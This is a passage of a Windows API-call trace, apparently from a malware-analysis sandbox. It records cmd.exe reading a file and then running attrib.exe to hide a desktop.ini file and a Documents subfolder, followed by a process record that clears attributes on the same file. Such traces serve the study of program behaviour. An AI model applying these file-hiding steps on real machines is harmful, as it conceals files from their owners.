lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile 
(in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 
[0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, 
lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: 
lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, 
lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.119] _close (_FileHandle=4) returned 0 [0131.119] FindNextFileW (in: hFindFile=0x200820, lpFindFileData=0x12f3a0 | out: lpFindFileData=0x12f3a0) returned 0 [0131.120] GetLastError () returned 0x12 [0131.120] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.120] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.122] _close (_FileHandle=3) returned 0 [0131.122] GetConsoleTitleW (in: lpConsoleTitle=0x12f7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.122] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0131.122] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.123] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.123] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.123] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.124] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.124] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.124] GetConsoleTitleW (in: lpConsoleTitle=0x12f56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.124] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x12f3f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f4bc | out: lpAttributeList=0x12f3f4, lpSize=0x12f4bc) returned 1 [0131.124] UpdateProcThreadAttribute (in: lpAttributeList=0x12f3f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f4b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f3f4, lpPreviousValue=0x0) returned 1 [0131.124] GetStartupInfoW (in: lpStartupInfo=0x12f3b0 | out: lpStartupInfo=0x12f3b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.124] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.124] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f450*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f49c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessInformation=0x12f49c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x9c0, dwThreadId=0x9e0)) returned 1 [0131.126] CloseHandle (hObject=0x50) returned 1 [0131.126] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.126] GetEnvironmentStringsW () 
returned 0x202d20* [0131.126] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.126] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0131.161] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f390 | out: lpExitCode=0x12f390*=0x0) returned 1 [0131.161] CloseHandle (hObject=0x4c) returned 1 [0131.161] _vsnwprintf (in: _Buffer=0x12f4d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f39c | out: _Buffer="00000000") returned 8 [0131.161] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.162] GetEnvironmentStringsW () returned 0x202d20* [0131.162] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.162] GetEnvironmentStringsW () returned 0x202d20* [0131.162] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.162] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f3f4 | out: lpAttributeList=0x12f3f4) [0131.162] GetConsoleTitleW (in: lpConsoleTitle=0x12f7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.162] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.162] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.162] GetLastError () returned 0x2 [0131.162] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, 
lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.163] GetLastError () returned 0x2 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.163] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.163] GetLastError () returned 0x2 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.163] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.163] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.163] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.163] GetConsoleTitleW (in: lpConsoleTitle=0x12f56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.163] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f3f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f4bc | out: lpAttributeList=0x12f3f4, lpSize=0x12f4bc) returned 1 [0131.163] UpdateProcThreadAttribute (in: lpAttributeList=0x12f3f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f4b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f3f4, lpPreviousValue=0x0) returned 1 [0131.163] GetStartupInfoW (in: lpStartupInfo=0x12f3b0 | out: lpStartupInfo=0x12f3b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.163] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.163] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f450*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f49c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessInformation=0x12f49c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9f4, dwThreadId=0x9b8)) returned 1 [0131.165] CloseHandle (hObject=0x4c) returned 1 [0131.165] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.165] GetEnvironmentStringsW () returned 0x203760* [0131.165] FreeEnvironmentStringsW (penv=0x203760) returned 1 [0131.165] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0131.210] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f390 | out: lpExitCode=0x12f390*=0x0) returned 1 [0131.210] CloseHandle (hObject=0x50) returned 1 [0131.210] _vsnwprintf (in: _Buffer=0x12f4d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f39c | out: _Buffer="00000000") returned 8 [0131.210] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.210] GetEnvironmentStringsW () returned 0x203760* [0131.210] FreeEnvironmentStringsW (penv=0x203760) returned 1 
[0131.210] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.210] GetEnvironmentStringsW () returned 0x203760* [0131.211] FreeEnvironmentStringsW (penv=0x203760) returned 1 [0131.211] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f3f4 | out: lpAttributeList=0x12f3f4) [0131.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.211] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.211] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.211] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.211] SetConsoleInputExeNameW () returned 0x1 [0131.211] GetConsoleOutputCP () returned 0x1b5 [0131.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.211] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.212] exit (_Code=0) Process: id = "102" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x848" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" 